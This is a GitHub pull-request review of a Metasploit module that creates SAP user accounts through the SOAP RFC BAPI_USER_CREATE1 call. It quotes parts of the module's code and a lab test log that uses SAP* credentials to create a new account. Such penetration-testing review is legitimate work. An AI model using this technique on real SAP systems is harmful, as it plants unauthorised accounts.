This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The modul... #1029

Merged
merged 2 commits into from Nov 18, 2012

2 participants

@nmonkee

This module calls the RFC BAPI_USER_CREATE1 module (via SOAP). The module can be used for creating/modifying users.

@brandonprry brandonprry commented on an outdated diff Nov 9, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ data << '</n1:BAPI_USER_CREATE1>'
+ data << '</env:Body>'
+ data << '</env:Envelope>'
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',

trailing comma

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+# experience - a very cool guy. I'd also like to thank Chris John Riley,
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',

A little more descriptive name pls

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+# Ian de Villiers and Joris van de Vis who have Beta tested the modules and
+# provided excellent feedback. Some people just seem to enjoy hacking SAP :)
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',

Version field isn't needed anymore

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP).
+ The module can be used for creating/modifying users.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],
+ 'Author' => ['Agnivesh Sathasivam','nmonkee'],
+ 'License' => BSD_LICENSE

Can MSF_LICENSE be used?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+
+class Metasploit4 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SAP SOAP RFC BAPI_USER_CREATE1',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module calls the RFC BAPI_USER_CREATE1 module (via SOAP).
+ The module can be used for creating/modifying users.
+ },
+ 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]],

No general url's pls, references to the technique used in the module

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7

msftidy warnings should be fixed

$ tools/msftidy.rb modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb 
sap_soap_bapi_user_create1.rb:9 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:10 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:12 - [ERROR] Unicode detected: "# Mariano Nu\xC3\xB1ez (the author of the Bizploit framework) helped me in my efforts\n"
sap_soap_bapi_user_create1.rb:14 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:15 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:26 - [WARNING] Spaces at EOL
sap_soap_bapi_user_create1.rb:49 - [WARNING] Spaces at EOL
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
+ begin
+ print_status("[SAP] #{ip}:#{rport} - Attempting to create user '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}'")
+ res = send_request_raw({
+ 'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
+ 'method' => 'POST',
+ 'data' => data,
+ 'headers' =>{
+ 'Content-Length' => data.size.to_s,
+ 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if res.code = 200

if res and res.code = 200

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 commented on the diff Nov 14, 2012
...s/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb
+ 'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
+ 'Authorization' => 'Basic ' + user_pass,
+ 'Content-Type' => 'text/xml; charset=UTF-8',
+ }
+ }, 45)
+ if res.code = 200
+ if res.body =~ /<h1>Logon failed<\/h1>/
+ print_error("[SAP] #{ip}:#{rport} - Logon failed")
+ elsif res.body =~ /faultstring/
+ error = []
+ error.push(res.body.scan(%r{<faultstring>(.*?)</faultstring>}))
+ print_error("[SAP] #{ip}:#{rport} - #{error.join().chomp}")
+ else
+ print_good("[SAP] #{ip}:#{rport} - User '#{datastore['BAPI_USER']}' with password '#{datastore['BAPI_PASSWORD']}' created")
+ end
+ else

maybe res can be nil at this point still

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@jvazquez-r7 jvazquez-r7 merged commit b9a8791 into rapid7:master Nov 18, 2012

1 check passed

Details default The Travis build passed
@jvazquez-r7

merged! Test :

msf  auxiliary(sap_soap_bapi_user_create1) > set RHOSTS 192.168.1.160
RHOSTS => 192.168.1.160
msf  auxiliary(sap_soap_bapi_user_create1) > set RPORT 8080
RPORT => 8080
msf  auxiliary(sap_soap_bapi_user_create1) > set RPORT 8000
RPORT => 8000
msf  auxiliary(sap_soap_bapi_user_create1) > set USERNAME SAP*
USERNAME => SAP*
msf  auxiliary(sap_soap_bapi_user_create1) > set PASSWORD admin1234
PASSWORD => admin1234
msf  auxiliary(sap_soap_bapi_user_create1) > set client 001
client => 001
msf  auxiliary(sap_soap_bapi_user_create1) > set BAPI_USER MSF
BAPI_USER => MSF
msf  auxiliary(sap_soap_bapi_user_create1) > set BAPI_PASSWORD msf1234
BAPI_PASSWORD => msf1234
msf  auxiliary(sap_soap_bapi_user_create1) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.1.160:8000 - Attempting to create user 'MSF' with password 'msf1234'
[+] [SAP] 192.168.1.160:8000 - User 'MSF' with password 'msf1234' created
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After that:

msf  auxiliary(sap_soap_bapi_user_create1) > use auxiliary/scanner/sap/sap_soap_rfc_ping 
msf  auxiliary(sap_soap_rfc_ping) > show options

Module options (auxiliary/scanner/sap/sap_soap_rfc_ping):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT    001              yes       Client
   PASSWORD  06071992         yes       Password 
   Proxies                    no        Use a proxy chain
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     8000             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  SAP*             yes       Username 
   VHOST                      no        HTTP server virtual host

msf  auxiliary(sap_soap_rfc_ping) > set RHOSTS 192.168.1.160
RHOSTS => 192.168.1.160
msf  auxiliary(sap_soap_rfc_ping) > set username MSF
username => MSF
msf  auxiliary(sap_soap_rfc_ping) > set password msf1234
password => msf1234
msf  auxiliary(sap_soap_rfc_ping) > rexploit
[*] Reloading module...

[*] [SAP] 192.168.1.160:8000 - sending SOAP RFC_PING request
[+] [SAP] 192.168.1.160:8000 - RFC service is alive
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment